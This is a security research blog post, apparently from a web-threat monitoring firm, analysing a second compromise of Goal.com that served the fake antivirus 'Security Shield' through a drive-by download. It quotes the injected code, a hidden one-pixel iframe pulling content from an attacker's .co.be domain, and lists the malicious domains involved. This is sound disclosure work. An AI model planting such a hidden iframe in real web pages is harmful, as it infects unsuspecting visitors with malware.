Goal.com spreading malware again: "Security Shield" fake anti-virus

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

In our last post we researched Goal.com's infection and one of our conclusions were: "From what we've collected, parts of goal.com seem to have been compromised allowing the attacker to manipulate content at will. A backdoor may exist to allow the attacker continuous control of goal.com's content."

That infection was eliminated from Goal.com a day later. However, HackAlert just flagged a new infection, suggesting that the attacker should have a backdoor into Goal.com. This time, they've made Goal.com serve a fake anti-virus software called "Security Shield."


Behavior: Users visit Goal.com, and are served with malicious scripts residing on 31d6f5art8.co.be, which starts a drive-by download process that installs Security Shield into the vistors' machines, without having to trick the visitors into doing anything or clicking on anything. Simply visiting the page infects the visitors. Security Shield will continuously pop up fake alerts and launch browsers to open porn sites, and only stops after a "license" has been purchased. Rebooting will not remove this malware; it's installed in the victims' machines and will always execute.

The exploit domain (a78hl7zv4p.co.be) only serves to each IP once.

Very quickly after the initial publication of this post, the attacker quickly retired the above-mentioned pair of malicious domains, and used a new pair: zfdim0u06t.co.be and 4t7uxaxrg8.co.be. When we modified our blog again, they retired the new pair, and replaced with a third pair: uzldzzzeo3.co.be and zepa6hr6jk.co.be.

Detection rates:
The malicious domains include 31d6f5art8.co.be, a78hl7zv4p.co.be, zfdim0u06t.co.be, and 4t7uxaxrg8.co.be. None has been flagged by any of the 18 supported blacklists on urlvoid.com. As for Goal.com, itself, the same--0 out of 18 vendors on urlvoid.com.

The binary executable for Security Shield triggered only 6 out of 42 vendors on VirusTotal.

Technique used:
Drive-by download, attacker has control of Goal.com's content. Not malvertising.

Below is a video of the entire infection process, from initially visiting goal.com, to later ending up with a fake antivirus on the system.

[The Infection]
The injection point was [http://www.goal.com/en], and the injected code was:

<div id="eplayer">
<style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style>
<iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe>

Which then generates and iframe to http://a78hl7zv4p.co.be/domains/buy, which then serves the exploit code. Upon successful exploitation, the browser process connects to the following URL format and downloads Security Shield:

Security Shield installs itself into the system and starts to show fake alerts and pop up browsers to open porn sites:

[The Detection]
The binary executable for Security Shield triggered only 6 out of 42 vendors on VirusTotal.

As for Goal.com, 0 out of 18 vendors on urlvoid.com has flagged them:

Goal.com receives 232,116 unique visitors per day according to compete.com, 215,989 according to checksitetraffic.com, and ranks 379 globally on alexa.com.

Read more (rest of article)...